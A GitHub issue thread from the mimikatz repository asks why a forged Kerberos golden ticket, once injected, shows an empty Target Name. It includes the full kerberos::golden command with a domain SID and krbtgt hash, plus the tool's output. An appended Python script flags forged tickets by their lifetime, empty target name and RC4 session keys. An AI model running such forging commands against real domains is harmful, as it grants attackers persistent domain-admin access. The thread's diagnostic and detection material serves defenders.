gentilkiwi / mimikatz

A little tool to play with Windows security
http://blog.gentilkiwi.com/mimikatz

TargetName on kerberos tickets injections #109

Closed tomkahana closed 6 years ago

tomkahana commented 6 years ago

Hi Kiwi! I have Windows 10 Enterprise N, using mimikatz 2.1.1, running mimikatz under admin privileges.

I'm injecting golden ticket by the command: kerberos::golden /admin:user1 /domain:ACME2.COM /sid:S-1-5-21-3657242463-3937142114-3749652718-1428 /krbtgt:6194bd1a5bf3ecd542e8aac9860bddf0 /ticket:acme2.com.kirbi /ptt

User      : user1
Domain    : ACME2.COM (ACME2)
SID       : S-1-5-21-3657242463-3937142114-3749652718-1428
User Id   : 500
Groups Id : *513 512 520 518 519 
ServiceKey: 6194bd1a5bf3ecd542e8aac9860bddf0 - rc4_hmac_nt      
Lifetime  : 11/11/2017 6:47:12 PM ; 11/9/2027 6:47:12 PM ; 11/9/2027 6:47:12 PM
-> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Golden ticket for 'user1 @ ACME2.COM' successfully submitted for current session

It works well and the ticket is injected. However, I noticed that TargetName is not like Service Name, as you can see:

Group 2 - Ticket Granting Ticket
 [00000000]
   Start/End/MaxRenew: 11/11/2017 6:47:12 PM ; 11/9/2027 6:47:12 PM ; 11/9/2027 6:47:12 PM
   Service Name (02) : krbtgt ; ACME2.COM ; @ ACME2.COM
   **Target Name  (--) : @ ACME2.COM**
   Client Name  (01) : user1 ; @ ACME2.COM
   Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ; 
   Session Key       : 0x00000017 - rc4_hmac_nt      
     b9cef01e6e653cf148b0e4ff9ac0b937
   Ticket            : 0x00000017 - rc4_hmac_nt       ; kvno = 2    [...]

where a real TGT looks like:

Group 2 - Ticket Granting Ticket
 [00000000]
  Start/End/MaxRenew: 11/11/2017 6:57:43 PM ; 11/12/2017 4:57:43 AM ; 11/18/2017 6:57:43 
  Service Name (02) : krbtgt ; ACME2.COM ; @ ACME2.COM
  **Target Name  (02) : krbtgt ; ACME2 ; @ ACME2.COM**
  Client Name  (01) : user1 ; @ ACME2.COM ( ACME2 )
  Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ; 
  Session Key       : 0x00000012 - aes256_hmac      
  56b4e9488f086a75b1c68abd703327de66cfbb35df95a7f275f52107fdb9c2f2
  Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2 [...]

I looked at the code and I noticed that _KERB_RETRIEVE_TKT_REQUEST contains TargetName while KERB_SUBMIT_TKT_REQUEST doesn't.

How can I force TargetName to be populated on the injection?

Thank you very much, and let me know what additional data you need.

Tom

gentilkiwi commented 6 years ago

TargetName is not a "KRB-CRED" field. I only display it because it was populated in memory by LSASS. It's exactly like the "missing" KDC called field with klist.

In all cases, it's not needed at all to make it work :)
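The two listings in the issue differ in more than the Target Name line: the forged ticket has a ten-year lifetime and renew window and an RC4 session key, while the KDC-issued one has a ten-hour lifetime, a seven-day renew window and an AES key. As gentilkiwi notes, Target Name is filled in by LSASS in memory rather than carried in the KRB-CRED, so a blank Target Name is a host-local artefact of injection and only one of several signals a defender would check. The script below is an added example, not mimikatz code and not from either participant: it parses the listing layout quoted above and flags tickets that deviate from the policy a domain normally applies. The thresholds (10 h lifetime, 7 d renewal, AES session keys) are assumptions about the domain, and the sample input is constructed from the two listings in the issue, including the truncated MaxRenew timestamp on the real ticket, which the parser tolerates.

```python
"""Flag Kerberos ticket entries that look unlike KDC-issued ones.

Added example for this issue thread; not part of mimikatz. It parses the
ticket-listing text layout quoted in the issue and applies heuristics that
defenders use when triaging ticket dumps:

  * ticket lifetime or renew window beyond domain policy
    (thresholds are assumptions: 10 h lifetime, 7 d renewal)
  * an empty Target Name, as on the injected ticket in the issue
  * a non-AES session key where the domain normally issues AES keys
"""
import re
from datetime import datetime, timedelta

# Constructed sample input, copied from the two listings quoted in the issue.
FORGED_LISTING = """\
Group 2 - Ticket Granting Ticket
 [00000000]
   Start/End/MaxRenew: 11/11/2017 6:47:12 PM ; 11/9/2027 6:47:12 PM ; 11/9/2027 6:47:12 PM
   Service Name (02) : krbtgt ; ACME2.COM ; @ ACME2.COM
   Target Name  (--) : @ ACME2.COM
   Client Name  (01) : user1 ; @ ACME2.COM
   Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;
   Session Key       : 0x00000017 - rc4_hmac_nt
     b9cef01e6e653cf148b0e4ff9ac0b937
   Ticket            : 0x00000017 - rc4_hmac_nt       ; kvno = 2    [...]
"""

# MaxRenew is truncated (no AM/PM) exactly as it appears in the issue.
REAL_LISTING = """\
Group 2 - Ticket Granting Ticket
 [00000000]
  Start/End/MaxRenew: 11/11/2017 6:57:43 PM ; 11/12/2017 4:57:43 AM ; 11/18/2017 6:57:43
  Service Name (02) : krbtgt ; ACME2.COM ; @ ACME2.COM
  Target Name  (02) : krbtgt ; ACME2 ; @ ACME2.COM
  Client Name  (01) : user1 ; @ ACME2.COM ( ACME2 )
  Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;
  Session Key       : 0x00000012 - aes256_hmac
  56b4e9488f086a75b1c68abd703327de66cfbb35df95a7f275f52107fdb9c2f2
  Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2 [...]
"""

TIME_FORMATS = ("%m/%d/%Y %I:%M:%S %p", "%m/%d/%Y %I:%M:%S")


def parse_time(text):
    """Parse one timestamp as printed in the listing; tolerate a missing AM/PM."""
    text = text.strip()
    for fmt in TIME_FORMATS:
        try:
            return datetime.strptime(text, fmt)
        except ValueError:
            continue
    raise ValueError(f"unrecognised timestamp: {text!r}")


def _names(principal):
    """'krbtgt ; ACME2 ; @ ACME2.COM' -> ['krbtgt', 'ACME2'] (realm token dropped)."""
    parts = [p.strip() for p in principal.split(";")]
    return [p for p in parts if p and not p.startswith("@")]


def parse_listing(text):
    """Split a listing into tickets and extract the fields the heuristics need."""
    tickets = []
    # Each ticket starts with an index line such as ' [00000000]'; the first
    # chunk before it is the group header and is skipped.
    for chunk in re.split(r"^\s*\[[0-9A-Fa-f]{8}\]\s*$", text, flags=re.M)[1:]:
        times = re.search(r"Start/End/MaxRenew:\s*(.*)", chunk)
        service = re.search(r"Service Name\s*\((\S+)\)\s*:\s*(.*)", chunk)
        target = re.search(r"Target Name\s*\((\S+)\)\s*:\s*(.*)", chunk)
        skey = re.search(r"Session Key\s*:\s*0x[0-9A-Fa-f]+\s*-\s*(\S+)", chunk)
        if not (times and service and target and skey):
            continue
        start, end, renew = (parse_time(t) for t in times.group(1).split(";"))
        tickets.append({
            "service": _names(service.group(2)),
            "target_type": target.group(1),
            "target": _names(target.group(2)),
            "start": start,
            "end": end,
            "renew_until": renew,
            "session_etype": skey.group(1),
        })
    return tickets


def assess(ticket, max_lifetime=timedelta(hours=10), max_renew=timedelta(days=7),
           expected_etypes=("aes256_hmac", "aes128_hmac")):
    """Return the heuristic findings for one parsed ticket (empty list = looks normal).

    The default thresholds are assumptions about domain policy, not values
    taken from the issue.
    """
    findings = []
    if ticket["end"] - ticket["start"] > max_lifetime:
        findings.append("long_lifetime")
    if ticket["renew_until"] - ticket["start"] > max_renew:
        findings.append("long_renew")
    # Target Name type '--' or no principal components at all.
    if ticket["target_type"] == "--" or not ticket["target"]:
        findings.append("empty_target_name")
    if ticket["session_etype"] not in expected_etypes:
        findings.append("weak_etype")
    return findings


def analyse(text, **policy):
    """Parse a listing and pair every ticket with its findings."""
    return [(t, assess(t, **policy)) for t in parse_listing(text)]


if __name__ == "__main__":
    for label, listing in (("forged", FORGED_LISTING), ("real", REAL_LISTING)):
        for ticket, findings in analyse(listing):
            print(label, "/".join(ticket["service"]), findings or "no findings")
```

Run against the two sample listings, the injected ticket is reported with all four findings and the KDC-issued one with none; in practice the thresholds should be set from the domain's actual Kerberos policy, and the Target Name check only applies to listings taken from the host where the ticket lives, since that field never leaves LSASS.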